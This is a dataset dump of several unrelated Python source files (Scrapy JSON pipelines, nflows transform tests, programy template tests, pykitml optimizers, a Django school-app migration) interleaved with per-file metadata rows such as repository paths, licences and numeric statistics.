line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline140(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment140.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline160(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment160.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline180(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment180.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline200(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment200.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline225(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment225.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline250(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment250.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
| 35.590164
| 87
| 0.63427
| 1,088
| 8,684
| 4.899816
| 0.096507
| 0.099043
| 0.053648
| 0.070156
| 0.810167
| 0.810167
| 0.810167
| 0.810167
| 0.810167
| 0.810167
| 0
| 0.025607
| 0.217526
| 8,684
| 243
| 88
| 35.736626
| 0.75894
| 0.02257
| 0
| 0.754902
| 0
| 0
| 0.093958
| 0.073026
| 0
| 0
| 0
| 0
| 0
| 1
| 0.323529
| false
| 0
| 0.029412
| 0
| 0.568627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
60a8beb5b9e97782258e868142d32c50e1260e96
| 241
|
py
|
Python
|
src/sandbox/runner_errors.py
|
ospiper/Sandbox-Runner
|
d6a463fa7744ea2a88553eef197b6f8a9f4d91f0
|
[
"MIT"
] | null | null | null |
src/sandbox/runner_errors.py
|
ospiper/Sandbox-Runner
|
d6a463fa7744ea2a88553eef197b6f8a9f4d91f0
|
[
"MIT"
] | null | null | null |
src/sandbox/runner_errors.py
|
ospiper/Sandbox-Runner
|
d6a463fa7744ea2a88553eef197b6f8a9f4d91f0
|
[
"MIT"
] | null | null | null |
class RunnerException(Exception):
def __init__(self, message=''):
super().__init__()
self.message = message
class ArgumentError(RunnerException):
def __str__(self):
return 'ArgumentError: %s' % self.message
| 24.1
| 49
| 0.6639
| 23
| 241
| 6.434783
| 0.521739
| 0.222973
| 0.202703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.215768
| 241
| 9
| 50
| 26.777778
| 0.783069
| 0
| 0
| 0
| 0
| 0
| 0.070539
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
60bdc6d0dea391a60f80b69d77ada0b2711b82c6
| 3,825
|
py
|
Python
|
tests/transforms/standard_test.py
|
Tennessee-Wallaceh/nflows
|
ac0bf432fc7904458a933ed14180f0ac26e3f93d
|
[
"MIT"
] | 522
|
2020-02-26T16:51:51.000Z
|
2022-03-31T15:38:48.000Z
|
tests/transforms/standard_test.py
|
Tennessee-Wallaceh/nflows
|
ac0bf432fc7904458a933ed14180f0ac26e3f93d
|
[
"MIT"
] | 47
|
2020-03-24T18:36:59.000Z
|
2022-03-25T09:47:18.000Z
|
tests/transforms/standard_test.py
|
Tennessee-Wallaceh/nflows
|
ac0bf432fc7904458a933ed14180f0ac26e3f93d
|
[
"MIT"
] | 77
|
2020-03-21T21:00:44.000Z
|
2022-03-31T00:41:51.000Z
|
"""Tests for the standard transforms."""
import unittest
import numpy as np
import torch
from nflows.transforms import standard
from tests.transforms.transform_test import TransformTest
class IdentityTransformTest(TransformTest):
def test_forward(self):
batch_size = 10
shape = [2, 3, 4]
inputs = torch.randn(batch_size, *shape)
transform = standard.IdentityTransform()
outputs, logabsdet = transform(inputs)
self.assert_tensor_is_good(outputs, [batch_size] + shape)
self.assert_tensor_is_good(logabsdet, [batch_size])
self.assertEqual(outputs, inputs)
self.assertEqual(logabsdet, torch.zeros(batch_size))
def test_inverse(self):
batch_size = 10
shape = [2, 3, 4]
inputs = torch.randn(batch_size, *shape)
transform = standard.IdentityTransform()
outputs, logabsdet = transform.inverse(inputs)
self.assert_tensor_is_good(outputs, [batch_size] + shape)
self.assert_tensor_is_good(logabsdet, [batch_size])
self.assertEqual(outputs, inputs)
self.assertEqual(logabsdet, torch.zeros(batch_size))
def test_forward_inverse_are_consistent(self):
batch_size = 10
shape = [2, 3, 4]
inputs = torch.randn(batch_size, *shape)
transform = standard.IdentityTransform()
self.assert_forward_inverse_are_consistent(transform, inputs)
class AffineScalarTransformTest(TransformTest):
def test_forward(self):
batch_size = 10
shape = [2, 3, 4]
inputs = torch.randn(batch_size, *shape)
def test_case(scale, shift, true_outputs, true_logabsdet):
with self.subTest(scale=scale, shift=shift):
transform = standard.AffineScalarTransform(scale=scale, shift=shift)
outputs, logabsdet = transform(inputs)
self.assert_tensor_is_good(outputs, [batch_size] + shape)
self.assert_tensor_is_good(logabsdet, [batch_size])
self.assertEqual(outputs, true_outputs)
self.assertEqual(
logabsdet, torch.full([batch_size], true_logabsdet * np.prod(shape))
)
self.eps = 1e-6
test_case(None, 2.0, inputs + 2.0, 0.)
test_case(2.0, None, inputs * 2.0, np.log(2.0))
test_case(2.0, 2.0, inputs * 2.0 + 2.0, np.log(2.0))
def test_inverse(self):
batch_size = 10
shape = [2, 3, 4]
inputs = torch.randn(batch_size, *shape)
def test_case(scale, shift, true_outputs, true_logabsdet):
with self.subTest(scale=scale, shift=shift):
transform = standard.AffineScalarTransform(scale=scale, shift=shift)
outputs, logabsdet = transform.inverse(inputs)
self.assert_tensor_is_good(outputs, [batch_size] + shape)
self.assert_tensor_is_good(logabsdet, [batch_size])
self.assertEqual(outputs, true_outputs)
self.assertEqual(
logabsdet, torch.full([batch_size], true_logabsdet * np.prod(shape))
)
self.eps = 1e-6
test_case(None, 2.0, inputs - 2.0, 0.)
test_case(2.0, None, inputs / 2.0, -np.log(2.0))
test_case(2.0, 2.0, (inputs - 2.0) / 2.0, -np.log(2.0))
def test_forward_inverse_are_consistent(self):
batch_size = 10
shape = [2, 3, 4]
inputs = torch.randn(batch_size, *shape)
def test_case(scale, shift):
transform = standard.AffineScalarTransform(scale=scale, shift=shift)
self.assert_forward_inverse_are_consistent(transform, inputs)
self.eps = 1e-6
test_case(None, 2.0)
test_case(2.0, None)
test_case(2.0, 2.0)
if __name__ == "__main__":
unittest.main()
| 37.135922
| 88
| 0.627451
| 469
| 3,825
| 4.910448
| 0.130064
| 0.093791
| 0.06079
| 0.062527
| 0.899262
| 0.899262
| 0.887972
| 0.887972
| 0.817629
| 0.807208
| 0
| 0.030594
| 0.265098
| 3,825
| 102
| 89
| 37.5
| 0.788687
| 0.008889
| 0
| 0.743902
| 0
| 0
| 0.002114
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 1
| 0.109756
| false
| 0
| 0.060976
| 0
| 0.195122
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7150e5caa533bc0178550dd34a75f1d589d55718
| 68
|
py
|
Python
|
recognizer/networks/__init__.py
|
hemanth346/number-recognizer
|
9a3354fd4c2b1d5746f3c09b7fbc83ca75239b6a
|
[
"Apache-2.0"
] | null | null | null |
recognizer/networks/__init__.py
|
hemanth346/number-recognizer
|
9a3354fd4c2b1d5746f3c09b7fbc83ca75239b6a
|
[
"Apache-2.0"
] | null | null | null |
recognizer/networks/__init__.py
|
hemanth346/number-recognizer
|
9a3354fd4c2b1d5746f3c09b7fbc83ca75239b6a
|
[
"Apache-2.0"
] | null | null | null |
from .cnn_7k import Net as cnn7k
from .cnn_13k import Net as cnn14k
| 22.666667
| 34
| 0.794118
| 14
| 68
| 3.714286
| 0.642857
| 0.269231
| 0.423077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 0.176471
| 68
| 2
| 35
| 34
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
718513f97667021c9b49798c95ccbd4592506a2b
| 4,094
|
py
|
Python
|
src/test/parser/template/graph/test_get.py
|
hiitsme123/python
|
e08309fe61fd5ed88cfb39e9f402613dd7e39269
|
[
"MIT"
] | 5
|
2017-02-03T07:38:45.000Z
|
2022-01-06T11:29:29.000Z
|
src/test/parser/template/graph/test_get.py
|
hiitsme123/python
|
e08309fe61fd5ed88cfb39e9f402613dd7e39269
|
[
"MIT"
] | 8
|
2017-02-03T06:59:03.000Z
|
2017-04-28T14:23:46.000Z
|
src/test/parser/template/graph/test_get.py
|
hiitsme123/python
|
e08309fe61fd5ed88cfb39e9f402613dd7e39269
|
[
"MIT"
] | 8
|
2017-02-02T15:12:12.000Z
|
2017-04-02T13:35:03.000Z
|
import unittest
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.get import TemplateGetNode
from test.parser.template.graph.test_graph_client import TemplateGraphTestClient
class TemplateGraphGetTests(TemplateGraphTestClient):
def test_get_template_predicate_as_attrib(self):
template = ET.fromstring("""
<template>
<get name="somepred" />
</template>
""")
ast = self.parser.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
self.assertEqual(len(ast.children), 1)
get_node = ast.children[0]
self.assertIsNotNone(get_node)
self.assertIsInstance(get_node, TemplateGetNode)
self.assertIsNotNone(get_node.name)
self.assertIsInstance(get_node.name, TemplateNode)
self.assertEqual(get_node.name.resolve(None, None), "somepred")
self.assertFalse(get_node.local)
def test_get_template_predicate_as_attrib_mixed(self):
template = ET.fromstring("""
<template>
Hello <get name="somepred" /> how are you
</template>
""")
ast = self.parser.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
self.assertEqual(len(ast.children), 5)
get_node = ast.children[1]
self.assertIsNotNone(get_node)
self.assertIsInstance(get_node, TemplateGetNode)
self.assertIsNotNone(get_node.name)
self.assertIsInstance(get_node.name, TemplateNode)
self.assertEqual(get_node.name.resolve(None, None), "somepred")
self.assertFalse(get_node.local)
def test_get_template_var_as_attrib(self):
template = ET.fromstring("""
<template>
<get var="somevar" />
</template>
""")
ast = self.parser.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
self.assertEqual(len(ast.children), 1)
get_node = ast.children[0]
self.assertIsNotNone(get_node)
self.assertIsInstance(get_node, TemplateGetNode)
self.assertIsNotNone(get_node.name)
self.assertIsInstance(get_node.name, TemplateNode)
self.assertEqual(get_node.name.resolve(None, None), "somevar")
self.assertTrue(get_node.local)
def test_get_template_predicate_as_child(self):
template = ET.fromstring("""
<template>
<get><name>somepred as text</name></get>
</template>
""")
ast = self.parser.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
self.assertEqual(len(ast.children), 1)
get_node = ast.children[0]
self.assertIsNotNone(get_node)
self.assertIsInstance(get_node, TemplateGetNode)
self.assertIsNotNone(get_node.name)
self.assertIsInstance(get_node.name, TemplateNode)
self.assertEqual(get_node.name.resolve(None, None), "somepred as text")
self.assertFalse(get_node.local)
def test_get_template_local_as_child(self):
template = ET.fromstring("""
<template>
<get><var>somevar</var></get>
</template>
""")
ast = self.parser.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
self.assertEqual(len(ast.children), 1)
get_node = ast.children[0]
self.assertIsNotNone(get_node)
self.assertIsInstance(get_node, TemplateGetNode)
self.assertIsNotNone(get_node.name)
self.assertIsInstance(get_node.name, TemplateNode)
self.assertEqual(get_node.name.resolve(None, None), "somevar")
self.assertTrue(get_node.local)
if __name__ == '__main__':
unittest.main()
| 35.912281
| 80
| 0.691988
| 450
| 4,094
| 6.115556
| 0.126667
| 0.089026
| 0.059956
| 0.094477
| 0.886628
| 0.852471
| 0.852471
| 0.84048
| 0.763445
| 0.732558
| 0
| 0.003053
| 0.199805
| 4,094
| 113
| 81
| 36.230089
| 0.836996
| 0
| 0
| 0.785714
| 0
| 0
| 0.097215
| 0.007084
| 0
| 0
| 0
| 0
| 0.510204
| 1
| 0.05102
| false
| 0
| 0.05102
| 0
| 0.112245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e085a42cbb4998c61c57958928bd8d5393f9bdd0
| 7,255
|
py
|
Python
|
pykitml/optimizers.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 34
|
2020-03-06T07:53:43.000Z
|
2022-03-13T06:12:29.000Z
|
pykitml/optimizers.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 6
|
2021-06-08T22:43:23.000Z
|
2022-03-08T13:57:33.000Z
|
pykitml/optimizers.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 1
|
2020-11-30T21:20:32.000Z
|
2020-11-30T21:20:32.000Z
|
from abc import ABC, abstractmethod
import numpy as np
'''
Optimizers module,
REF: http://cs231n.github.io/neural-networks-3/
'''
class Optimizer(ABC):
'''
This class is the base class for all optimizers
'''
@abstractmethod
def _optimize(self, parameter, parameter_gradient):
pass
@property
@abstractmethod
def _mlearning_rate(self):
pass
@_mlearning_rate.setter
@abstractmethod
def _mlearning_rate(self, learning_rate):
pass
@property
@abstractmethod
def _mdecay_rate(self):
pass
def _decay(self):
self._mlearning_rate = self._mdecay_rate*self._mlearning_rate
class GradientDescent(Optimizer):
'''
This class implements gradient descent optimization.
'''
def __init__(self, learning_rate, decay_rate=1):
'''
Parameters
----------
learning_rate : float
decay_rate : float
Decay rate for leraning rate
'''
self._learning_rate = learning_rate
self._decay_rate = decay_rate
@property
def _mlearning_rate(self):
return self._learning_rate
@_mlearning_rate.setter
def _mlearning_rate(self, learning_rate):
self._learning_rate = learning_rate
@property
def _mdecay_rate(self):
return self._decay_rate
def _optimize(self, parameter, parameter_gradient):
# Update and return the parameter
return parameter - (self._learning_rate * parameter_gradient)
class Momentum(Optimizer):
'''
This class implements momentum optimization.
'''
def __init__(self, learning_rate, decay_rate=1, beta=0.9):
'''
Parameters
----------
learning_rate : float
decay_rate : float
Decay rate for leraning rate
beta : float
Should be between 0 to 1.
'''
self._learning_rate = learning_rate
self._decay_rate = decay_rate
self._beta = beta
self._v = 0
@property
def _mlearning_rate(self):
return self._learning_rate
@_mlearning_rate.setter
def _mlearning_rate(self, learning_rate):
self._learning_rate = learning_rate
@property
def _mdecay_rate(self):
return self._decay_rate
def _optimize(self, parameter, parameter_gradient):
# Integrate v
self._v = (self._beta*self._v) - (self._learning_rate*parameter_gradient)
# Update and return the parameter
return parameter + self._v
class Nesterov(Optimizer):
'''
This class implements neterov momentum optimization.
'''
def __init__(self, learning_rate, decay_rate=1, beta=0.9):
'''
Parameters
----------
learning_rate : float
decay_rate : float
Decay rate for leraning rate
beta : float
Should be between 0 to 1.
'''
self._learning_rate = learning_rate
self._decay_rate = decay_rate
self._beta = beta
self._v = 0
self._v_prev = 0
@property
def _mlearning_rate(self):
return self._learning_rate
@_mlearning_rate.setter
def _mlearning_rate(self, learning_rate):
self._learning_rate = learning_rate
@property
def _mdecay_rate(self):
return self._decay_rate
def _optimize(self, parameter, parameter_gradient):
# Back up before updating
self._v_prev = self._v
# Integrate v
self._v = (self._beta*self._v) - (self._learning_rate*parameter_gradient)
# Update and return the parameter
return parameter - (self._beta*self._v_prev) + ((1+self._beta)*self._v)
class Adagrad(Optimizer):
'''
This class implements adagrad optmization.
'''
def __init__(self, learning_rate, decay_rate=1):
'''
Parameters
----------
learning_rate : float
decay_rate : float
Decay rate for leraning rate
'''
self._learning_rate = learning_rate
self._decay_rate = decay_rate
self._cache = 0
@property
def _mlearning_rate(self):
return self._learning_rate
@_mlearning_rate.setter
def _mlearning_rate(self, learning_rate):
self._learning_rate = learning_rate
@property
def _mdecay_rate(self):
return self._decay_rate
def _optimize(self, parameter, parameter_gradient):
# For numerical stability
eps = 10e-8
# Calculate cache
self._cache += parameter_gradient**2
# Update parameter and return
return parameter + (-self._learning_rate*parameter_gradient)/((self._cache**0.5)+eps)
class RMSprop(Optimizer):
'''
This class implements RMSprop optimization.
'''
def __init__(self, learning_rate, decay_rate=1, beta=0.9):
'''
Parameters
----------
learning_rate : float
decay_rate : float
Decay rate for leraning rate
beta : float
Should be between 0 to 1.
'''
self._learning_rate = learning_rate
self._decay_rate = decay_rate
self._beta = beta
self._cache = 0
@property
def _mlearning_rate(self):
return self._learning_rate
@_mlearning_rate.setter
def _mlearning_rate(self, learning_rate):
self._learning_rate = learning_rate
@property
def _mdecay_rate(self):
return self._decay_rate
def _optimize(self, parameter, parameter_gradient):
# For numerical stability
eps = 10e-8
# Calculate cache
self._cache = self._beta*self._cache + (1-self._beta)*(parameter_gradient**2)
# Update parameter and return
return parameter + (-self._learning_rate*parameter_gradient)/((self._cache**0.5)+eps)
class Adam(Optimizer):
'''
This class implements adam optimization.
'''
def __init__(self, learning_rate, decay_rate=1, beta1=0.9, beta2=0.9):
'''
Parameters
----------
learning_rate : float
decay_rate : float
Decay rate for leraning rate
beta1 : float
Should be between 0 to 1.
beta2 : float
Should be between 0 to 1.
'''
self._learning_rate = learning_rate
self._decay_rate = decay_rate
self._beta1 = beta1
self._beta2 = beta2
self._m = 0
self._v = 0
@property
def _mlearning_rate(self):
return self._learning_rate
@_mlearning_rate.setter
def _mlearning_rate(self, learning_rate):
self._learning_rate = learning_rate
@property
def _mdecay_rate(self):
return self._decay_rate
def _optimize(self, parameter, parameter_gradient):
# For numerical stability
eps = 10e-8
# Momentum
self._m = self._beta1*self._m + (1-self._beta1)*parameter_gradient
# RMS
self._v = self._beta2*self._v + (1-self._beta2)*(parameter_gradient**2)
# Update parameter
return parameter + (-self._learning_rate*self._m)/((self._v**0.5)+eps)
| 26.97026
| 93
| 0.609786
| 809
| 7,255
| 5.127318
| 0.103832
| 0.159113
| 0.142719
| 0.072324
| 0.795805
| 0.778447
| 0.751205
| 0.738428
| 0.738428
| 0.724687
| 0
| 0.014023
| 0.302136
| 7,255
| 268
| 94
| 27.070896
| 0.805254
| 0.215851
| 0
| 0.810606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.265152
| false
| 0.030303
| 0.015152
| 0.098485
| 0.469697
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0945cb2990e92af8549ceb800820bbd6325efbe
| 11,989
|
py
|
Python
|
src/AE_academico/migrations/0001_initial.py
|
furthz/Colegio
|
573e9e4006c0d1cd33190b53da5988fdc0c9ca4c
|
[
"MIT"
] | 2
|
2017-09-26T14:15:43.000Z
|
2018-03-19T01:03:28.000Z
|
src/AE_academico/migrations/0001_initial.py
|
furthz/Colegio
|
573e9e4006c0d1cd33190b53da5988fdc0c9ca4c
|
[
"MIT"
] | 1
|
2017-10-21T22:30:39.000Z
|
2017-10-21T22:30:39.000Z
|
src/AE_academico/migrations/0001_initial.py
|
furthz/Colegio
|
573e9e4006c0d1cd33190b53da5988fdc0c9ca4c
|
[
"MIT"
] | 9
|
2017-07-22T16:13:29.000Z
|
2020-11-12T21:03:36.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-22 20:08
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('register','0002_register'),
('enrollment', '0001_initial'),
('APIs', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Aula',
fields=[
('id_aula', models.AutoField(primary_key=True)),
('tipo_servicio', models.ForeignKey(db_column="id_tipo_servicio", to='enrollment.TipoServicio')),
('nombre', models.CharField(max_length=100, blank=True, null=True)),
#('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
#('tipo', models.IntegerField()),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10,null=True)),
('usuario_modificacion', models.CharField(max_length=10,null=True)),
('activo', models.BooleanField()),
],
options={
#'db_table': 'tipo_servicio',
'managed': settings.IS_MIGRATE,
#'managed': False,
},
),
migrations.CreateModel(
name='Curso',
fields=[
('id_curso', models.AutoField(primary_key=True)),
('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
('nombre', models.CharField(max_length=100, blank=True, null=True)),
('descripcion', models.CharField(max_length=500, blank=True, null=True)),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
#'db_table': 'servicio',
'managed': settings.IS_MIGRATE,
#'managed': False,
},
),
migrations.CreateModel(
name='AulaCurso',
fields=[
('id_aula_curso', models.AutoField(primary_key=True)),
('aula', models.ForeignKey(db_column="id_aula", to='AE_academico.Aula')),
('curso', models.ForeignKey(db_column="id_curso", to='AE_academico.Curso')),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
migrations.CreateModel(
name='CursoDocente',
fields=[
('id_curso_docente', models.AutoField(primary_key=True)),
('docente', models.ForeignKey(db_column="id_docente", to='register.Docente')),
('curso', models.ForeignKey(db_column="id_aula_curso", to='AE_academico.AulaCurso')),
('tutor', models.BooleanField(default=False)),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
migrations.CreateModel(
name='HorarioAula',
fields=[
('id_horario_aula', models.AutoField(primary_key=True)),
('curso', models.ForeignKey(db_column="id_curso", to='AE_academico.Curso')),
('docente', models.ForeignKey(db_column="id_docente", to='register.Docente')),
('lugar', models.CharField(max_length=50)),
('dia', models.CharField(max_length=10)),
('hora_inicio', models.TimeField()),
('hora_fin', models.TimeField()),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
migrations.CreateModel(
name='Evento',
fields=[
('id_evento', models.AutoField(primary_key=True)),
('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
('encargado', models.ForeignKey(db_column="id_personal", to='register.Personal')),
('nombre', models.CharField(max_length=100, blank=True, null=True)),
('descripcion', models.CharField(max_length=500, blank=True, null=True)),
('fecha_evento', models.DateField()),
('hora_inicio', models.TimeField()),
('hora_fin', models.TimeField()),
('comunicado', models.ForeignKey(db_column="id_comunicado", to='APIs.Comunicado', null=True, blank=True)),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
migrations.CreateModel(
name='Asistencia',
fields=[
('id_asistencia', models.AutoField(primary_key=True)),
('alumno', models.ForeignKey(db_column='id_alumno', to='register.Alumno')),
#('curso', models.ForeignKey(db_column='id_curso', to='AE_academico.Curso')),
('fecha', models.DateField()),
('estado_asistencia', models.IntegerField()),
('comentario', models.CharField(max_length=500, blank=True, null=True)),
('comunicado', models.ForeignKey(db_column="id_comunicado", to='APIs.Comunicado', null=True, blank=True)),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
migrations.CreateModel(
name='PeriodoAcademico',
fields=[
('id_periodo_academico', models.AutoField(primary_key=True)),
('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
('nombre', models.CharField(max_length=50)),
('fecha_inicio', models.DateField()),
('fecha_fin', models.DateField()),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
migrations.CreateModel(
name='Notas',
fields=[
('id_nota', models.AutoField(primary_key=True)),
('curso', models.ForeignKey(db_column="id_curso", to='AE_academico.Curso')),
('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
('periodo_academico', models.ForeignKey(db_column="id_periodo_academico", to='AE_academico.PeriodoAcademico')),
('alumno', models.ForeignKey(db_column='id_alumno', to='register.Alumno')),
('nota', models.CharField(max_length=2)),
('comunicado', models.ForeignKey(db_column="id_comunicado", to='APIs.Comunicado', null=True, blank=True)),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
migrations.CreateModel(
name='AulaMatricula',
fields=[
('id_aula_matricula', models.AutoField(primary_key=True)),
('aula', models.ForeignKey(db_column="id_aula", to='AE_academico.Aula')),
('matricula', models.ForeignKey(db_column="id_matricula", to='enrollment.Matricula')),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
migrations.CreateModel(
name='RecordatorioAula',
fields=[
('id_recordatorio_aula', models.AutoField(primary_key=True)),
('aula', models.ForeignKey(db_column="id_aula", to='AE_academico.Aula')),
('nombre', models.CharField(max_length=50, blank=False, null=False)),
('descripcion', models.CharField(max_length=200, blank=True, null=True)),
('fecha_programacion', models.DateField(blank=False, null=False)),
('estado', models.IntegerField()),
('fecha_creacion', models.DateField()),
('fecha_modificacion', models.DateField()),
('usuario_creacion', models.CharField(max_length=10, null=True)),
('usuario_modificacion', models.CharField(max_length=10, null=True)),
('activo', models.BooleanField()),
],
options={
# 'db_table': 'matricula',
'managed': settings.IS_MIGRATE,
# 'managed': False,
},
),
]
| 46.649805
| 127
| 0.535658
| 1,042
| 11,989
| 5.963532
| 0.107486
| 0.082073
| 0.098487
| 0.131316
| 0.825394
| 0.781783
